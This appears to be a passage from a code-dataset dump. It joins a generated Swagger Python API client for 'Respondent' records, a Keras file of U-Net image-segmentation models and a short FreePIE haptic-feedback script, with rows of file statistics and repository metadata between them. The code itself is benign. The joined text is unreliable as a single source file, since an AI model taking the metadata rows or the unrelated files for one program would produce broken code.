kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_delete_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_delete_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_delete_with_http_info(self, respondent_id, **kwargs):
"""
Delete a Respondent
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_delete_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_delete`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_get(self, respondent_id, **kwargs):
"""
Find a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_get(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: Search by research id. (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_get_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_get_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_get_with_http_info(self, respondent_id, **kwargs):
"""
Find a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_get_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: Search by research id. (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_get`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_metadata_get(self, respondent_id, **kwargs):
"""
Find Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_get(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: ID of the Respondent (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_metadata_get_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_metadata_get_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_metadata_get_with_http_info(self, respondent_id, **kwargs):
"""
Find Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_get_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: ID of the Respondent (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_metadata_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_metadata_get`")
resource_path = '/respondent/{respondent_id}/metadata'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RespondentMetadataResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_metadata_post(self, respondent_id, body, **kwargs):
"""
Add Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_post(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param RespondentMetadata body: Request body (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, **kwargs)
else:
(data) = self.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, **kwargs)
return data
def respondent_respondent_id_metadata_post_with_http_info(self, respondent_id, body, **kwargs):
"""
Add Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param RespondentMetadata body: Request body (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_metadata_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_metadata_post`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_respondent_id_metadata_post`")
resource_path = '/respondent/{respondent_id}/metadata'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RespondentMetadataResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_put(self, respondent_id, body, **kwargs):
"""
Update a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_put(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_put_with_http_info(respondent_id, body, **kwargs)
else:
(data) = self.respondent_respondent_id_put_with_http_info(respondent_id, body, **kwargs)
return data
def respondent_respondent_id_put_with_http_info(self, respondent_id, body, **kwargs):
"""
Update a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_put_with_http_info(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_put`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_respondent_id_put`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 41.958076 | 132 | 0.582491 | 3,526 | 34,028 | 5.409813 | 0.061826 | 0.079895 | 0.054207 | 0.026422 | 0.935203 | 0.929541 | 0.923408 | 0.916855 | 0.911088 | 0.90291 | 0 | 0.000486 | 0.334813 | 34,028 | 810 | 133 | 42.009877 | 0.84038 | 0.350829 | 0 | 0.778667 | 1 | 0 | 0.175023 | 0.053588 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.018667 | 0 | 0.117333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1af943e305d8a425da297353336883836376ed57 | 13,856 | py | Python | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | import numpy as np
import os
import skimage.io as io
import skimage.transform as trans
from keras import backend as keras
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from custom_activations import swish
def unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)
up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)
up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv9 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9)
    model = Model(inputs=inputs, outputs=conv10)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
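# Minimal usage sketch for the model builders in this module (illustrative
# only; the array names and weight-file path below are hypothetical and not
# part of this file):
#
#   model = unet(input_size=(320, 480, 1))
#   checkpoint = ModelCheckpoint('unet_weights.hdf5', monitor='loss', save_best_only=True)
#   model.fit(train_images, train_masks, batch_size=2, epochs=10, callbacks=[checkpoint])
#   predicted_masks = model.predict(test_images)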
# Convolutional neural network based on the U-Net architecture
def unet_cracks(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(512,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.3)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(pool4))
merge7 = Concatenate(axis=3)([conv3,up7])
conv7 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)
up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = Concatenate(axis=3)([conv2,up8])
conv8 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)
conv8 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)
up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = Concatenate(axis=3)([conv1,up9])
conv9 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)
conv9 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv9 = Conv2D(2,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv10 = Conv2D(1,1, activation='sigmoid')(conv9) # Sigmoid output: per-pixel probability in (0, 1), typically thresholded to 0/1
model = Model(inputs = inputs, outputs = conv10)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
# Smaller network, still based on the U-Net architecture
def simple_unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(512,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
up5 = Conv2D(256, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(drop4))
trans5 = Conv2DTranspose(256, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up5)
merge5 = Concatenate(axis=3)([conv3,trans5])
conv5 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge5)
conv5 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv5)
up6 = Conv2D(128, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv5))
trans6 = Conv2DTranspose(128, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up6)
merge6 = Concatenate(axis=3)([conv2,trans6])
conv6 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge6)
conv6 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv6)
up7 = Conv2D(64, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv6))
trans7 = Conv2DTranspose(64, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up7)
merge7 = Concatenate(axis=3)([conv1,trans7])
conv7 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv7)
conv7 = Conv2D(2,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv7)
conv8 = Conv2D(1,1, activation='sigmoid')(conv7) # Sigmoid output: per-pixel probability in (0, 1), typically thresholded to 0/1
model = Model(inputs = inputs, outputs = conv8)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
def crf_unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(inputs)
drop1 = Dropout(0.2)(conv1)
conv1 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool1)
drop2 = Dropout(0.2)(conv2)
conv2 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool2)
drop3 = Dropout(0.2)(conv3)
conv3 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop3)
up3 = UpSampling2D(size=(2, 2))(conv3)
up3 = Concatenate(axis=3)([conv2,up3])
conv4 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(up3)
drop4 = Dropout(0.2)(conv4)
conv4 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop4)
up5 = UpSampling2D(size = (2,2))(conv4)
up5 = Concatenate(axis=3)([conv1,up5])
conv5 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(up5)
drop5 = Dropout(0.2)(conv5)
conv5 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop5)
conv6 = Conv2D(2, 1, activation='swish', padding='same', kernel_initializer='he_normal')(conv5)
conv7 = Conv2D(1,1, activation='sigmoid')(conv6)
model = Model(inputs = inputs, outputs = conv7)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
# Smaller network, still based on the U-Net architecture, using LeakyReLU
def lrcrf_unet(pretrained_weights = None,input_size = (250,250,1)):
inputs = Input(input_size)
leaky_relu = LeakyReLU(alpha=0.2)
conv1 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(inputs)
conv1 = leaky_relu(conv1)
drop1 = Dropout(0.2)(conv1)
conv1 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(drop1)
conv1 = leaky_relu(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(pool1)
conv2 = leaky_relu(conv2)
drop2 = Dropout(0.2)(conv2)
conv2 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(drop2)
conv2 = leaky_relu(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128,3, padding='same', kernel_initializer='he_normal')(pool2)
conv3 = leaky_relu(conv3)
drop3 = Dropout(0.2)(conv3)
conv3 = Conv2D(128,3, padding='same', kernel_initializer='he_normal')(drop3)
conv3 = leaky_relu(conv3)
up3 = UpSampling2D(size=(2, 2))(conv3)
up3 = Concatenate(axis=3)([conv2,up3])
conv4 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(up3)
conv4 = leaky_relu(conv4)
drop4 = Dropout(0.2)(conv4)
conv4 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(drop4)
conv4 = leaky_relu(conv4)
up5 = UpSampling2D(size = (2,2))(conv4)
up5 = Concatenate(axis=3)([conv1,up5])
conv5 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(up5)
conv5 = leaky_relu(conv5)
drop5 = Dropout(0.2)(conv5)
conv5 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(drop5)
conv5 = leaky_relu(conv5)
conv6 = Conv2D(2, 1, padding='same', kernel_initializer='he_normal')(conv5)
conv6 = leaky_relu(conv6)
conv7 = Conv2D(1,1, activation='sigmoid')(conv6)
model = Model(inputs = inputs, outputs = conv7)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model | 50.569343 | 132 | 0.690026 | 1,806 | 13,856 | 5.163898 | 0.075858 | 0.099078 | 0.171134 | 0.225177 | 0.886018 | 0.880763 | 0.877118 | 0.865537 | 0.854815 | 0.823933 | 0 | 0.07541 | 0.145352 | 13,856 | 274 | 133 | 50.569343 | 0.712126 | 0.02526 | 0 | 0.587629 | 0 | 0 | 0.117285 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025773 | false | 0 | 0.056701 | 0 | 0.108247 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2105c3135b74b036ddfff8fbe6b797c9dfa145a0 | 398 | py | Python | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 1,946 | 2018-05-25T11:29:44.000Z | 2022-03-24T09:15:54.000Z | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 708 | 2018-05-27T09:56:07.000Z | 2021-11-08T11:26:30.000Z | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 382 | 2018-05-25T20:13:24.000Z | 2022-03-29T18:33:12.000Z |
diagnostics.watch(alvr.input_haptic_feedback[0][0]) #fAmplitude
diagnostics.watch(alvr.input_haptic_feedback[0][1]) #fDurationSeconds
diagnostics.watch(alvr.input_haptic_feedback[0][2]) #fFrequency
diagnostics.watch(alvr.input_haptic_feedback[1][0]) #fAmplitude
diagnostics.watch(alvr.input_haptic_feedback[1][1]) #fDurationSeconds
diagnostics.watch(alvr.input_haptic_feedback[1][2]) #fFrequency
